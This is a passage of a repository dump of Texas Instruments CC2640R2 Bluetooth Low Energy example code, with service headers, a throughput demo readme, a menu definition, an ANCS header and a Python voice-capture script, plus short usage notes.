UUID for the GATT Primary Service Declaration\n */\n#define TEMPERATURE_SERVICE_SERV_UUID 0xAA00\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_DATA 0\n#define TEMPERATURE_SERVICE_DATA_UUID 0xAA01\n#define TEMPERATURE_SERVICE_DATA_LEN sizeof(Temperature_Service_Data)\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_CONFIG 1\n#define TEMPERATURE_SERVICE_CONFIG_UUID 0xAA02\n#define TEMPERATURE_SERVICE_CONFIG_LEN 1\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_PERIOD 2\n#define TEMPERATURE_SERVICE_PERIOD_UUID 0xAA03\n#define TEMPERATURE_SERVICE_PERIOD_LEN 1\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * Profile Callbacks\n */\n\n/*!\n * Temperature_Service callback function prototype\n *\n * Callbacks occur when characteristic values have changed\n *\n * @param paramID Profile parameter ID\n */\ntypedef void (*Temperature_ServiceChange_t)( uint8 paramID );\n\n/*!\n * Data structure of callback functions.\n */\ntypedef struct\n{\n // Called when characteristic value changes\n Temperature_ServiceChange_t pfnChangeCb;\n} Temperature_ServiceCBs_t;\n\n\n\n/*********************************************************************\n * API FUNCTIONS\n */\n\n\n/*!\n * @brief Initialize the Temperature Service\n *\n * Initializes the Temperature_Service service by registering GATT attributes\n * with the GATT server.\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_AddService( void );\n\n/*!\n * @brief Registers the application callback function.\n *\n * @warning Only call this function once.\n *\n * @param appCallbacks Pointer to application callbacks.\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_RegisterAppCBs(\n Temperature_ServiceCBs_t *appCallbacks );\n\n/*!\n * @brief Set a Temperature_Service parameter.\n *\n * @param param Profile parameter ID\n *\n * @param len length of data to write\n *\n * @param value pointer to data to write. This is dependent on the\n * parameter ID and WILL be cast to the appropriate data type\n * (example: data type of uint16 will be cast to uint16\n * pointer).\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_SetParameter( uint8 param, uint8 len,\n void *value );\n\n/*!\n * @brief Get a Temperature_Service parameter.\n *\n * @param param Profile parameter ID\n *\n * @param value pointer to buffer to read the data into. This is dependent on the\n * parameter ID and WILL be cast to the appropriate data type\n * (example: data type of uint16 will be cast to uint16\n * pointer).\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_GetParameter( uint8 param, void *value );\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _TEMPERATURE_SERVICE_H_ */\n"
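As a usage illustration of the API this header declares, a sketch that packs one reading into the Data characteristic. The helper name and the raw sensor values are hypothetical; the byte layout follows the struct and table above:

```c
#include "temperature_service.h"

/* Sketch: publish one 4-byte reading (object + ambience) through the
 * service. Assumes Temperature_Service_AddService() has already run. */
static bStatus_t publishTemperature(uint16_t objRaw, uint16_t ambRaw)
{
    Temperature_Service_Data data;

    data.objectLowByte    = (uint8_t)(objRaw & 0xFF);
    data.objectHighByte   = (uint8_t)(objRaw >> 8);
    data.ambienceLowByte  = (uint8_t)(ambRaw & 0xFF);
    data.ambienceHighByte = (uint8_t)(ambRaw >> 8);

    /* TEMPERATURE_SERVICE_DATA_LEN == sizeof(Temperature_Service_Data) == 4 */
    return Temperature_Service_SetParameter(TEMPERATURE_SERVICE_DATA,
                                            TEMPERATURE_SERVICE_DATA_LEN,
                                            &data);
}
```

If a client has enabled notifications on the Data characteristic, updating the parameter is what triggers the periodic notification described in the file header.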
},
{
"alpha_fraction": 0.564051628112793,
"alphanum_fraction": 0.5846573710441589,
"avg_line_length": 33.72413635253906,
"blob_id": "fae6b3b97058d15031173e3497620cac8f4c58ae",
"content_id": "6d232284273c7000f75a0b33d4928c2def7570a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4028,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 116,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/src/app/spp_ble_server.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file spp_ble_server.h\n\n @brief This file contains the Simple BLE Peripheral sample application\n definitions and prototypes.\n\n Group: WCS, BTS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2016, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: ti-ble-3.0-stack-sdk_3_00_00\n Release Date: 2016-12-21 12:44:47\n *****************************************************************************/\n\n#ifndef SIMPLEBLEPERIPHERAL_H\n#define SIMPLEBLEPERIPHERAL_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n/*********************************************************************\n* EXTERNAL VARIABLES\n*/\n\n/*********************************************************************\n * CONSTANTS\n */\n// External Events for RTOS application\n#define SBP_UART_DATA_EVT 0x0010\n#define SBP_UART_ERROR_EVT 0x0020\n\n//LED parameters\n#define Board_LED_TOGGLE 3\n#define BLINK_DURATION 1000 // Milliseconds\n\n /* Delay */\n#ifdef TI_DRIVERS_I2C_INCLUDED\n#define delay_ms(i) Task_sleep( ((i) * 1000) / Clock_tickPeriod )\n#define MS_2_TICKS(ms) ( ((ms) * 1000) / Clock_tickPeriod )\n#else\n#define delay_ms(i) ( CPUdelay(12000*(i)) )\n#endif\n/*********************************************************************\n * MACROS\n */\n#define DEBUG_SIMPLE\n\n#if !defined(DEBUG_SIMPLE)\n# define Display_print0(handle, line, col, fmt) DEBUG(fmt); \\\n DEBUG_NEWLINE()\n# define Display_print1(handle, line, col, fmt, a0) DEBUG((uint8 *)fmt); \\\n DEBUG((uint8_t*)convInt32ToText((int32)a0)); DEBUG_NEWLINE()\n#else\n# define Display_print0(handle, line, col, fmt)\n\n# define Display_print1(handle, line, col, fmt, 
a0)\n\n#endif\n/*********************************************************************\n * FUNCTIONS\n */\n\n/*\n * Task creation function for the Simple BLE Peripheral.\n */\nextern void SimpleBLEPeripheral_createTask(void);\nextern void SPPBLEServer_toggleLed(uint8_t led, uint8_t state);\nextern char* convInt32ToText(int32 value);\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* SIMPLEBLEPERIPHERAL_H */\n"
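A small usage sketch of the helpers this header exposes; the LED index 0 is an illustrative placeholder, and whether `delay_ms()` busy-waits or calls `Task_sleep()` depends on the `TI_DRIVERS_I2C_INCLUDED` branch above:

```c
#include "spp_ble_server.h"

/* Sketch: blink once using the declarations above. Board_LED_TOGGLE (3)
 * is the pseudo-state this header defines for requesting a toggle. */
static void blinkOnce(void)
{
    SPPBLEServer_toggleLed(0, Board_LED_TOGGLE);  /* toggle on */
    delay_ms(BLINK_DURATION);                     /* hold ~1 second */
    SPPBLEServer_toggleLed(0, Board_LED_TOGGLE);  /* toggle back off */
}
```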
},
{
"alpha_fraction": 0.6860953569412231,
"alphanum_fraction": 0.7179550528526306,
"avg_line_length": 30.146154403686523,
"blob_id": "7149407e80423de74a160a3b842582f17f19209d",
"content_id": "bd1a1ce1f816b22f6b675aab6dbe10be466b5968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4049,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 130,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Throughput Central\n\n## Functional Overview\n\nThis project is meant to be utilized with BLE5-Stack Throughput Peripheral to\ndemonstrate Bluetooth™ 5 features.\n\nThis project is based on the Simple Central sample application from the\nBLE5-Stack component of the SDK.\n\nBLE5-Stack Throughput Peripheral Project should be used in order to do a full\nthroughput demo. However, this project can function standalone to demonstrate\nthe Data Length Extension, 2 Megabit, or Coded PHYs when connected to a peer\ndevice supporting these features.\n\nThis list contains the changes from the standard Simple Central example:\n- Added Support for a custom profile called Throughput Profile\n- Modified existing menu system to utilize the Two Button Menu\n- Changed Service and Characteristic Discover Behavior\n- Changed MTU Size of project\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_throughput_central_cc2640r2lp_stack`\n - Next build and load `ble5_throughput_central_cc2640r2lp_app`\n\n1. Connect to the LaunchPad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. Select 'Scan/Connect Menu' by pressing the\n right button (BTN2).\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n\n +Scan/Connect Menu >\n ```\n\n1. Then select \"Scan For Devices\" menu option by pressing the right button (BTN2).\n\n ```\n *Scan/Connect Menu\n < Next Item\n Scan for Devices >\n +Upper Menu\n ```\n\n1. After Scanning is Performed, choose the desired device to connect to by pressing\n the right button (BTN2). Note: If the peer device supports the Throughput Profile,\n below the peer device's address will contain the text:\n ``-- Throughput Profile Supported --``\n\n ```\n *Scan/Connect Menu\n < Next Item\n Select Next Device >\n Connect to Selected Device\n Scan for Devices\n +Upper Menu\n 2 Devices Found\n\n Scanned Device 1\n 0x98072DAA4E5E\n -- Throughput Profile Supported --\n ```\n\n1. Press the left button (BTN1) to move to the next action, \"Connect to\n Selected Device\". Then use the right button (BTN2) to begin connecting to\n the displayed device.\n\n After a connection is successful, you will be presented with new menu\n options:\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n +Set PHY >\n +Set PDU\n Toggle RSSI Readings\n Disconnect\n ```\n\n As well as connection details in the UART display:\n\n ```\n Peer Device : 0x98072DAA4E5E\n PHY: 1 Mbps\n Instant Rate (kb/s): 247.904\n Average Rate (kb/s): 264.104 over 10 Samples\n RSSI -dBm: 44\n ```\n\n As shown, if the Throughput Profile is supported on the peer, throughput information will be displayed.\n\n1. As desired, BLE5-Stack Throughput Central can modify the PHY and DLE PDU\n size of the connection. Use left button (BTN1) to change selected action,\n and right button (BTN2) to invoke the selected action. 
The display will\n update if connection PDU or PHY is changed.\n\n ```\n Peer Device : 0x98072DAA4E5E\n Current PHY: 2 Mbps\n Instant Rate (kb/s): 1366.400\n Average Rate (kb/s): 1366.400 over 10 Samples\n RSSI -dBm: 32\n\n This Device's BDADDR : 0x00124B005220\n Device GAP Role: Central\n Device RX PDU Size: 251B\n MTU Size: 247B\n ```\n\n If Throughput Profile is supported on the peer, the displayed throughput\n will update in real time.\n"
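For context, the 251-byte "RX PDU Size" shown in the display corresponds to the LE Data Length Extension maximum. A hedged sketch of how an application on this stack can request it; 2120 microseconds is the Core Specification maximum transmit time for a 251-octet data PDU on the 1M PHY:

```c
#include "hci.h"

/* Sketch: request the maximum Data Length Extension PDU for the link. */
static void requestMaxPdu(uint16_t connHandle)
{
    /* 251 octets, 2120 us: the spec maxima for LE data PDUs */
    HCI_LE_SetDataLenCmd(connHandle, 251, 2120);
}
```

The controller negotiates the actual values with the peer, so the sizes shown on the display reflect what both sides agreed to, not necessarily what was requested.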
},
{
"alpha_fraction": 0.7129367589950562,
"alphanum_fraction": 0.7223796248435974,
"avg_line_length": 35.482757568359375,
"blob_id": "58ab363376fd344194994ecc77aa5ec05327d0a1",
"content_id": "37ef9efe91e63409d472ca3f7ac3600799b2d166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 29,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src/app/longrange_central_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"longrange_central_menu.h\"\n#include \"longrange_central.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 3 submenus, no actions, no upper */\nMENU_OBJ(sbcMenuMain, NULL, 3, NULL)\n MENU_ITEM_SUBMENU(&sbcMenuScanandConnect)\n MENU_ITEM_ACTION(\"Toggle RSSI Readings\", SimpleBLECentral_doToggleRSSI)\n MENU_ITEM_ACTION(\"Disconnect\", SimpleBLECentral_doDisconnect)\nMENU_OBJ_END\n\n/* Menu: Scanning and Connection\n 3 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuScanandConnect, \"Scan/Connect Menu\", 3, &sbcMenuMain)\n MENU_ITEM_ACTION(\"Select Next Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Connect to Selected Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Scan for Devices\", SimpleBLECentral_doScanAndConnect)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
{
"alpha_fraction": 0.664284348487854,
"alphanum_fraction": 0.6706587076187134,
"avg_line_length": 33.744964599609375,
"blob_id": "d621bfd17dd2a2e567b0c0da92f59149962b6e2d",
"content_id": "d920a0d97d7457ddd9d7f3f798b1f28f423eb194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5177,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 149,
"path": "/tools/scripts/voice/voice.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: voice_hogp.py\n *\n * Description: Voice of HID over GATT sample script\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\n\nfrom transport.hidtransport import HIDLegacy, HIDVoHoGP\nfrom codec.adpcm import ADPCM\nimport logging\nimport argparse\nfrom time import sleep\nimport time\nimport wave\nimport sys\n\n\ndef set_debug_level(loggers, formatter):\n\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n\n for log in loggers:\n\n logger = logging.getLogger(log)\n\n if \"ADPCM\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n #logger.setLevel(logging.WARNING)\n #logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n if \"HIDLegacy\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n #logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n if \"HIDVoHoGP\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n\n logger.addHandler(ch)\n\n\ndef main():\n\n \"\"\" Add argument parsing to the application \"\"\"\n parser = argparse.ArgumentParser(description=\"Voice test script\")\n parser.add_argument('--verbose', '-v', action='store_true', help=\"enable verbose output\")\n parser.add_argument('--transport_validation', action='store_true', help=\"enable transport level data validation; used for testing\")\n parser.add_argument('--transport', '-t', choices=[\"legacy\", \"vohogp\"], default=\"vohogp\", help=\"transport method used to get voice data\")\n\n args = vars(parser.parse_args())\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n if args[\"verbose\"]:\n set_debug_level([\"ADPCM\", \"HIDLegacy\", \"HIDVoHoGP\"], formatter)\n\n appLogger = logging.getLogger(\"APP\")\n appLogger.setLevel(logging.INFO)\n\n ch = 
logging.StreamHandler()\n ch.setFormatter(formatter)\n appLogger.addHandler(ch)\n\n def testfunction(data):\n appLogger.info(\"Test Callback with %s bytes\" % len(data))\n codec = ADPCM()\n decoded = codec.decode(data)\n\n filename = time.strftime(\"pdm_test_%Y-%m-%d_%H-%M-%S_adpcm\")+\".wav\"\n w = wave.open(filename, \"w\")\n w.setnchannels(1)\n w.setframerate(16000)\n w.setsampwidth(2)\n w.writeframes(decoded)\n w.close()\n appLogger.info(\"Created %s\" % filename)\n\n # Compare strings by value, not identity\n if args[\"transport\"] == \"vohogp\":\n transport = HIDVoHoGP(testfunction, vendor_id=0x000d, product_id=0x0000)\n elif args[\"transport\"] == \"legacy\":\n transport = HIDLegacy(testfunction, vendor_id=0x000d, product_id=0x0000)\n else:\n raise ValueError(\"Invalid transport selection\")\n\n transport.setDataValidation(args[\"transport_validation\"])\n\n print ('Starting script...\\n')\n sys.stdout.flush()\n\n if transport.open():\n print ('\\t1. Press and Hold MIC button')\n print ('\\t2. Speak into Microphone')\n print ('\\t3. Release MIC button to save data to file')\n sys.stdout.flush()\n\n while transport.isConnected():\n sleep(1)\n\n transport.close()\n else:\n print ('\\tUSB device is not connected or it does not have voice service.')\n print ('\\tMake sure the remote is connected.')\n print ('\\tAdd the \\\"-h\\\" option for help.')\n\nif __name__ == '__main__':\n main()\n"
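A typical invocation under the argument definitions above, assuming the HID remote is already paired and enumerated over USB:

```
python voice.py --transport vohogp --verbose
```

With `--verbose` set, the `set_debug_level()` helper raises the log level of the ADPCM codec and both HID transports so the per-packet processing is visible while recording.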
},
{
"alpha_fraction": 0.5832423567771912,
"alphanum_fraction": 0.5935669541358948,
"avg_line_length": 43.37445068359375,
"blob_id": "90dd4fc7fc30de872e9648337c6bba2aaa4f3d7b",
"content_id": "f60f778fcc8ed0aa7aefb04d0443f6c7e315513a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 10073,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 227,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file ancs.h\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2017-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n#ifndef ANCS_H\n#define ANCS_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n#include \"gatt.h\"\n/*********************************************************************\n * CONSTANTS\n */\n\n// ANCS discovery states.\nenum\n{\n ANCS_IDLE, // Initial idle state.\n ANCS_EXCHANGE_MTU, // Wait for the MTU exchange to take place.\n ANCS_DISC_SERVICE, // Discover the ANCS service by UUID.\n ANCS_STORE_SERVICE_HANDLES, // Store the ANCS service handles in the cache.\n ANCS_DISC_CHARS, // Discover the three characteristics: Notification Source, Control Point, and Data Source.\n ANCS_STORE_CHARS_HANDLES, // Store the handles of each characteristic in the handle cache.\n ANCS_DISC_NS_DESCS, // Discover the descriptors of the Notification Source (Trying to locate the CCCD).\n ANCS_STORE_NS_DESCS_HANDLES, // Store the descriptor's handles in the handle cache (ANCS_NOTIF_SCR_HDL_CCCD).\n ANCS_DISC_DS_DESCS, // Discover the descriptors of the Data Source (Trying to locate the CCCD).\n ANCS_STORE_DS_DESCS_HANDLES, // Store the descriptor's handles in the handle cache (ANCS_DATA_SRC_HDL_CCCD).\n ANCS_WRITE_DS_CCCD, // Perform a write to the Notification Source's CCCD to subscribe for notifications.\n ANCS_WRITE_NS_CCCD, // Perform a write to the Data Source's CCCD to subscribe for notifications.\n ANCS_DISC_FINISH, // Final state signifying the end of the discovery process.\n\n ANCS_DISC_FAILED = 0xFF // A failure state reached 
only if an error occurs.\n};\n\n// ANCS handle cache indices.\nenum\n{\n ANCS_NOTIF_SCR_HDL_START, // ANCS Notification Source characteristic start handle.\n ANCS_NOTIF_SCR_HDL_END, // ANCS Notification Source characteristic end handle.\n ANCS_NOTIF_SCR_HDL_CCCD, // ANCS Notification Source CCCD handle.\n\n ANCS_CTRL_POINT_HDL_START, // ANCS Control Point characteristic start handle.\n ANCS_CTRL_POINT_HDL_END, // ANCS Control Point characteristic end handle.\n\n ANCS_DATA_SRC_HDL_START, // ANCS Data Source characteristic start handle.\n ANCS_DATA_SRC_HDL_END, // ANCS Data Source characteristic end handle.\n ANCS_DATA_SRC_HDL_CCCD, // ANCS Data Source CCCD handle.\n};\n\n// Cache array length.\n#define HDL_CACHE_LEN 8\n\n// States for the notification attribute retrieval state machine (Ancs_handleNotifAttrRsp()).\nenum\n{\n NOTI_ATTR_ID_BEGIN, // ANCS notification attribute initial retrieval state.\n NOTI_ATTR_ID_APPID, // ANCS notification attribute AppID retrieval state.\n APP_ATTR_ID_DN, // ANCS application attribute display name retrieval state.\n NOTI_ATTR_ID_TITLE, // ANCS notification attribute Title retrieval state.\n NOTI_ATTR_ID_SUBTITLE, // ANCS notification attribute Subtitle retrieval state.\n NOTI_ATTR_ID_MESSAGE, // ANCS notification attribute Message retrieval state.\n NOTI_ATTR_ID_MESSAGE_SIZE, // ANCS notification attribute Message Size retrieval state.\n NOTI_ATTR_ID_DATE, // ANCS notification attribute Date retrieval state.\n NOTI_ATTR_ID_END // ANCS notification attribute final retrieval state.\n};\n\n// States for processing Data Source packets.\nenum\n{\n NOTI_ATTR_FIRST_PKT, // Initial retrieved Data Source packet processing state.\n NOTI_ATTR_CONTINUE_PKT, // Post-Initial retrieved Data Source packet processing state.\n};\n\n\n/*********************************************************************\n * MACROS\n */\n\n// Number of bytes required to store an ANCS notification UID\n#define ANCS_NOTIF_UID_LENGTH 4\n\n// CommandID Values\n#define COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES 0x00\n#define COMMAND_ID_GET_APP_ATTRIBUTES 0x01\n#define COMMAND_ID_PERFORM_NOTIFICATION_ACTION 0x02\n\n#define ACTION_ID_POSITIVE 0\n#define ACTION_ID_NEGATIVE 1\n\n// Notification AttributeID Values\n#define NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER 0\n#define NOTIFICATION_ATTRIBUTE_ID_TITLE 1\n#define NOTIFICATION_ATTRIBUTE_ID_SUBTITLE 2\n#define NOTIFICATION_ATTRIBUTE_ID_MESSAGE 3\n#define NOTIFICATION_ATTRIBUTE_ID_MESSAGE_SIZE 4\n#define NOTIFICATION_ATTRIBUTE_ID_DATE 5\n#define NOTIFICATION_ATTRIBUTE_ID_POSITIVE_ACTION_LABEL 6\n#define NOTIFICATION_ATTRIBUTE_ID_NEGATIVE_ACTION_LABEL 7\n\n// EventID Values\n#define EVENT_ID_NOTIFICATION_ADDED 0\n#define EVENT_ID_NOTIFICATION_MODIFIED 1\n#define EVENT_ID_NOTIFICATION_REMOVED 2\n\n// EventFlags\n#define EVENT_FLAG_SILENT 0x01\n#define EVENT_FLAG_IMPORTANT 0x02\n#define EVENT_FLAG_PREEXISTING 0x04\n#define EVENT_FLAG_POSITIVE_ACTION 0x08\n#define EVENT_FLAG_NEGATIVE_ACTION 0x10\n\n// CategoryID Values\n#define CATEGORY_ID_OTHER 0\n#define CATEGORY_ID_INCOMING_CALL 1\n#define CATEGORY_ID_MISSED_CALL 2\n#define CATEGORY_ID_VOICEMAIL 3\n#define CATEGORY_ID_SOCIAL 4\n#define CATEGORY_ID_SCHEDULE 5\n#define CATEGORY_ID_EMAIL 6\n#define CATEGORY_ID_NEWS 7\n#define CATEGORY_ID_HEALTH_AND_FITNESS 8\n#define CATEGORY_ID_BUSINESS_AND_FINANCE 9\n#define CATEGORY_ID_LOCATION 10\n#define CATEGORY_ID_ENTERTAINMENT 11\n\n\n// Define ANCS Client Flags\n#define CLIENT_NONE 0x00\n#define CLIENT_IMPORTANT_ALERT 0x01\n#define CLIENT_POSITIVE_ACT 0x02\n#define 
CLIENT_NEG_ACT 0x04\n\n// Error Codes received from Control Point\n#define UNKNOWN_COMMAND 0xA0\n#define INVALID_COMMAND 0xA1\n#define INVALID_PARAMETER 0xA2\n#define ACTION_FAILED 0xA3\n\n// AppAttributeID values\n#define APP_ATTRIBUTE_ID_DISPLAY_NAME 0x00\n\n// ANCS Control Point action length.\n#define PERFORM_NOTIFICATION_ACTION_LENGTH 6\n\n/*********************************************************************\n * GLOBAL\n */\n// The iPhones Connection handle.\nextern uint16_t Ancs_connHandle;\n\n// The ANCS handle cache.\nextern uint16_t Ancs_handleCache[HDL_CACHE_LEN];\n\n// Stores Data Service notification processing state.\nextern uint8_t notifAttrPktProcessState;\n\n// Stores Data Service app attribute processing state\nextern uint8_t appAttrPktProcessState;\n/*********************************************************************\n * FUNCTIONS\n */\n\n// ANCS service discovery functions.\nextern uint8_t Ancs_subsNotifSrc(void);\nextern uint8_t Ancs_subsDataSrc(void);\n\n// ANCS notification handling function.\nextern void Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg);\nextern void 